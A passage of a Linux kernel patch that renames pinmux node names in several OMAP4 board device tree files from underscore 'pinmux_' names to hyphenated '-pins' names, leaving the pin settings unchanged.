+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -89,7 +89,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -106,34 +106,34 @@
+ 		>;
+ 	};
+ 
+-	hsusb1phy_pins: pinmux_hsusb1phy_pins {
++	hsusb1phy_pins: hsusb1phy-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x08c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_wait1.gpio_62 */
+ 		>;
+ 	};
+ 
+-	w2cbw0015_pins: pinmux_w2cbw0015_pins {
++	w2cbw0015_pins: w2cbw0015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x066, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a19.gpio_43 */
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc1_pins: pinmux_mmc1_pins {
++	mmc1_pins: mmc1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0e2, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk */
+ 			OMAP4_IOPAD(0x0e4, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmcc1_cmd */
+@@ -144,7 +144,7 @@
+ 		>;
+ 	};
+ 
+-	mmc5_pins: pinmux_mmc5_pins {
++	mmc5_pins: mmc5-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk */
+ 			OMAP4_IOPAD(0x14a, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmcc5_cmd */
+diff --git a/arch/arm/boot/dts/omap4-kc1.dts b/arch/arm/boot/dts/omap4-kc1.dts
+index e59d17b25a1d9..c6b79ba8bbc91 100644
+--- a/arch/arm/boot/dts/omap4-kc1.dts
++++ b/arch/arm/boot/dts/omap4-kc1.dts
+@@ -35,42 +35,42 @@
+ &omap4_pmx_core {
+ 	pinctrl-names = "default";
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x144, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx */
+ 			OMAP4_IOPAD(0x146, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc2_pins: pinmux_mmc2_pins {
++	mmc2_pins: mmc2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x040, PIN_INPUT_PULLUP | MUX_MODE1)	/* sdmmc2_dat0 */
+ 			OMAP4_IOPAD(0x042, PIN_INPUT_PULLUP | MUX_MODE1)	/* sdmmc2_dat1 */
+@@ -85,7 +85,7 @@
+ 		>;
+ 	};
+ 
+-	usb_otg_hs_pins: pinmux_usb_otg_hs_pins {
++	usb_otg_hs_pins: usb-otg-hs-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x194, PIN_OUTPUT_PULLDOWN | MUX_MODE0)	/* usba0_otg_ce */
+ 			OMAP4_IOPAD(0x196, PIN_INPUT | MUX_MODE0)		/* usba0_otg_dp */
+diff --git a/arch/arm/boot/dts/omap4-mcpdm.dtsi b/arch/arm/boot/dts/omap4-mcpdm.dtsi
+index 915a9b31a33b4..03ade47431fbe 100644
+--- a/arch/arm/boot/dts/omap4-mcpdm.dtsi
++++ b/arch/arm/boot/dts/omap4-mcpdm.dtsi
+@@ -7,7 +7,7 @@
+  */
+ 
+ &omap4_pmx_core {
+-	mcpdm_pins: pinmux_mcpdm_pins {
++	mcpdm_pins: mcpdm-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a100106 abe_pdm_ul_data.abe_pdm_ul_data ag25 */
+ 		OMAP4_IOPAD(0x106, PIN_INPUT_PULLDOWN | MUX_MODE0)
+diff --git a/arch/arm/boot/dts/omap4-panda-common.dtsi b/arch/arm/boot/dts/omap4-panda-common.dtsi
+index 518652a599bd7..53b99004b19cf 100644
+--- a/arch/arm/boot/dts/omap4-panda-common.dtsi
++++ b/arch/arm/boot/dts/omap4-panda-common.dtsi
+@@ -237,14 +237,14 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x120, PIN_OUTPUT | MUX_MODE3)	/* hdq_sio.gpio_127 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)	/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -253,7 +253,7 @@
+ 		>;
+ 	};
+ 
+-	dss_dpi_pins: pinmux_dss_dpi_pins {
++	dss_dpi_pins: dss-dpi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x162, PIN_OUTPUT | MUX_MODE5)	/* dispc2_data23 */
+ 			OMAP4_IOPAD(0x164, PIN_OUTPUT | MUX_MODE5) 	/* dispc2_data22 */
+@@ -288,13 +288,13 @@
+ 		>;
+ 	};
+ 
+-	tfp410_pins: pinmux_tfp410_pins {
++	tfp410_pins: tfp410-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x184, PIN_OUTPUT | MUX_MODE3)	/* gpio_0 */
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -302,7 +302,7 @@
+ 		>;
+ 	};
+ 
+-	tpd12s015_pins: pinmux_tpd12s015_pins {
++	tpd12s015_pins: tpd12s015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a17.gpio_41 */
+ 			OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nbe1.gpio_60 */
+@@ -310,7 +310,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -327,28 +327,28 @@
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+@@ -359,7 +359,7 @@
+ 	 * wl12xx GPIO outputs for WLAN_EN, BT_EN, FM_EN, BT_WAKEUP
+ 	 * REVISIT: Are the pull-ups needed for GPIO 48 and 49?
+ 	 */
+-	wl12xx_gpio: pinmux_wl12xx_gpio {
++	wl12xx_gpio: wl12xx-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x066, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a19.gpio_43 */
+ 			OMAP4_IOPAD(0x06c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a22.gpio_46 */
+@@ -369,7 +369,7 @@
+ 	};
+ 
+ 	/* wl12xx GPIO inputs and SDIO pins */
+-	wl12xx_pins: pinmux_wl12xx_pins {
++	wl12xx_pins: wl12xx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x078, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs2.gpio_52 */
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+@@ -382,7 +382,7 @@
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x114, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpio_121 */
+ 		>;
+@@ -390,7 +390,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	led_wkgpio_pins: pinmux_leds_wkpins {
++	led_wkgpio_pins: leds-wkpins-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x05a, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk7 */
+ 			OMAP4_IOPAD(0x05c, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk8 */
+diff --git a/arch/arm/boot/dts/omap4-panda-es.dts b/arch/arm/boot/dts/omap4-panda-es.dts
+index 7c6886cd738f0..6c08dff58beae 100644
+--- a/arch/arm/boot/dts/omap4-panda-es.dts
++++ b/arch/arm/boot/dts/omap4-panda-es.dts
+@@ -38,26 +38,26 @@
+ };
+ 
+ &omap4_pmx_core {
+-	led_gpio_pins: gpio_led_pmx {
++	led_gpio_pins: gpio-led-pmx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_OUTPUT | MUX_MODE3)	/* gpio_110 */
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fc, PIN_INPUT_PULLUP | MUX_MODE3) /* gpio_113 */
+ 		>;
+ 	};
+ 
+-	bt_pins: pinmux_bt_pins {
++	bt_pins: bt-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x06c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a22.gpio_46 - BTEN */
+ 			OMAP4_IOPAD(0x072, PIN_OUTPUT_PULLUP | MUX_MODE3)	/* gpmc_a25.gpio_49 - BTWAKEUP */
+ 		>;
+ 	};
+ 
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts - HCI */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+diff --git a/arch/arm/boot/dts/omap4-sdp.dts b/arch/arm/boot/dts/omap4-sdp.dts
+index 9e976140f34a6..b2cb93edbc3a6 100644
+--- a/arch/arm/boot/dts/omap4-sdp.dts
++++ b/arch/arm/boot/dts/omap4-sdp.dts
+@@ -214,7 +214,7 @@
+ 			&tpd12s015_pins
+ 	>;
+ 
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+@@ -223,7 +223,7 @@
+ 		>;
+ 	};
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x140, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
+ 			OMAP4_IOPAD(0x142, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+@@ -232,21 +232,21 @@
+ 		>;
+ 	};
+ 
+-	uart4_pins: pinmux_uart4_pins {
++	uart4_pins: uart4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x15c, PIN_INPUT | MUX_MODE0)		/* uart4_rx.uart4_rx */
+ 			OMAP4_IOPAD(0x15e, PIN_OUTPUT | MUX_MODE0)		/* uart4_tx.uart4_tx */
+ 		>;
+ 	};
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x120, PIN_OUTPUT | MUX_MODE3)		/* hdq_sio.gpio_127 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	dmic_pins: pinmux_dmic_pins {
++	dmic_pins: dmic-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x110, PIN_OUTPUT | MUX_MODE0)		/* abe_dmic_clk1.abe_dmic_clk1 */
+ 			OMAP4_IOPAD(0x112, PIN_INPUT | MUX_MODE0)		/* abe_dmic_din1.abe_dmic_din1 */
+@@ -255,7 +255,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -264,7 +264,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp2_pins: pinmux_mcbsp2_pins {
++	mcbsp2_pins: mcbsp2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp2_clkx.abe_mcbsp2_clkx */
+ 			OMAP4_IOPAD(0x0f8, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp2_dr.abe_mcbsp2_dr */
+@@ -273,7 +273,7 @@
+ 		>;
+ 	};
+ 
+-	mcspi1_pins: pinmux_mcspi1_pins {
++	mcspi1_pins: mcspi1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x132, PIN_INPUT | MUX_MODE0)		/*  mcspi1_clk.mcspi1_clk */
+ 			OMAP4_IOPAD(0x134, PIN_INPUT | MUX_MODE0)		/*  mcspi1_somi.mcspi1_somi */
+@@ -282,7 +282,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -290,7 +290,7 @@
+ 		>;
+ 	};
+ 
+-	tpd12s015_pins: pinmux_tpd12s015_pins {
++	tpd12s015_pins: tpd12s015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a17.gpio_41 */
+ 			OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nbe1.gpio_60 */
+@@ -298,28 +298,28 @@
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+@@ -327,14 +327,14 @@
+ 	};
+ 
+ 	/* wl12xx GPIO output for WLAN_EN */
+-	wl12xx_gpio: pinmux_wl12xx_gpio {
++	wl12xx_gpio: wl12xx-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x07c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nwp.gpio_54 */
+ 		>;
+ 	};
+ 
+ 	/* wl12xx GPIO inputs and SDIO pins */
+-	wl12xx_pins: pinmux_wl12xx_pins {
++	wl12xx_pins: wl12xx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk.sdmmc5_clk */
+@@ -347,13 +347,13 @@
+ 	};
+ 
+ 	/* gpio_48 for ENET_ENABLE */
+-	enet_enable_gpio: pinmux_enet_enable_gpio {
++	enet_enable_gpio: enet-enable-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x070, PIN_OUTPUT_PULLDOWN | MUX_MODE3)	/* gpmc_a24.gpio_48 */
+ 		>;
+ 	};
+ 
+-	ks8851_pins: pinmux_ks8851_pins {
++	ks8851_pins: ks8851-pins {
+ 		pinctrl-single,pins = <
+ 			/* ENET_INT */
+ 			OMAP4_IOPAD(0x054, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_ad10.gpio_34 */
+diff --git a/arch/arm/boot/dts/omap4-var-om44customboard.dtsi b/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
+index 458cb53dd3d18..cadc7e02592bf 100644
+--- a/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
++++ b/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
+@@ -60,7 +60,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	uart1_pins: pinmux_uart1_pins {
++	uart1_pins: uart1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x13c, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi1_cs2.uart1_cts */
+ 			OMAP4_IOPAD(0x13e, PIN_OUTPUT | MUX_MODE1)		/* mcspi1_cs3.uart1_rts */
+@@ -69,7 +69,7 @@
+ 		>;
+ 	};
+ 
+-	mcspi1_pins: pinmux_mcspi1_pins {
++	mcspi1_pins: mcspi1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x132, PIN_INPUT | MUX_MODE0)		/*  mcspi1_clk.mcspi1_clk */
+ 			OMAP4_IOPAD(0x134, PIN_INPUT | MUX_MODE0)		/*  mcspi1_somi.mcspi1_somi */
+@@ -78,13 +78,13 @@
+ 		>;
+ 	};
+ 
+-	mcasp_pins: pinmux_mcsasp_pins {
++	mcasp_pins: mcsasp-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f8, PIN_OUTPUT | MUX_MODE2)		/*  mcbsp2_dr.abe_mcasp_axr */
+ 		>;
+ 	};
+ 
+-	dss_dpi_pins: pinmux_dss_dpi_pins {
++	dss_dpi_pins: dss-dpi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x162, PIN_OUTPUT | MUX_MODE5)		/* dispc2_data23 */
+ 			OMAP4_IOPAD(0x164, PIN_OUTPUT | MUX_MODE5)		/* dispc2_data22 */
+@@ -117,7 +117,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -125,14 +125,14 @@
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc5_pins: pinmux_mmc5_pins {
++	mmc5_pins: mmc5-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE3)		/* abe_mcbsp2_clkx.gpio_110 */
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk.sdmmc5_clk */
+@@ -144,32 +144,32 @@
+ 		>;
+ 	};
+ 
+-	gpio_led_pins: pinmux_gpio_led_pins {
++	gpio_led_pins: gpio-led-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x17e, PIN_OUTPUT | MUX_MODE3)		/* kpd_col4.gpio_172 */
+ 			OMAP4_IOPAD(0x180, PIN_OUTPUT | MUX_MODE3)		/* kpd_col5.gpio_173 */
+ 		>;
+ 	};
+ 
+-	gpio_key_pins: pinmux_gpio_key_pins {
++	gpio_key_pins: gpio-key-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x1a2, PIN_INPUT | MUX_MODE3)		/* sys_boot0.gpio_184 */
+ 		>;
+ 	};
+ 
+-	ks8851_irq_pins: pinmux_ks8851_irq_pins {
++	ks8851_irq_pins: ks8851-irq-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x17c, PIN_INPUT_PULLUP | MUX_MODE3)	/* kpd_col3.gpio_171 */
+ 		>;
+ 	};
+ 
+-	hdmi_hpd_pins: pinmux_hdmi_hpd_pins {
++	hdmi_hpd_pins: hdmi-hpd-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x098, PIN_INPUT_PULLDOWN | MUX_MODE3)	/* hdmi_hpd.gpio_63 */
+ 		>;
+ 	};
+ 
+-	backlight_pins: pinmux_backlight_pins {
++	backlight_pins: backlight-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x116, PIN_OUTPUT | MUX_MODE3)		/* abe_dmic_din3.gpio_122 */
+ 		>;
+diff --git a/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi b/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
+index d0032213101e6..de779d2d7c3e9 100644
+--- a/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
++++ b/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
+@@ -19,7 +19,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+@@ -28,7 +28,7 @@
+ 		>;
+ 	};
+ 
+-	wl12xx_ctrl_pins: pinmux_wl12xx_ctrl_pins {
++	wl12xx_ctrl_pins: wl12xx-ctrl-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_a17.gpio_41 (WLAN_IRQ) */
+ 			OMAP4_IOPAD(0x064, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a18.gpio_42 (BT_EN) */
+@@ -36,7 +36,7 @@
+ 		>;
+ 	};
+ 
+-	mmc4_pins: pinmux_mmc4_pins {
++	mmc4_pins: mmc4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x154, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi4_clk.sdmmc4_clk */
+ 			OMAP4_IOPAD(0x156, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi4_simo.sdmmc4_cmd */
+diff --git a/arch/arm/boot/dts/omap4-var-som-om44.dtsi b/arch/arm/boot/dts/omap4-var-som-om44.dtsi
+index 334cbbaa5b8b0..37d56b3010cff 100644
+--- a/arch/arm/boot/dts/omap4-var-som-om44.dtsi
++++ b/arch/arm/boot/dts/omap4-var-som-om44.dtsi
+@@ -65,21 +65,21 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
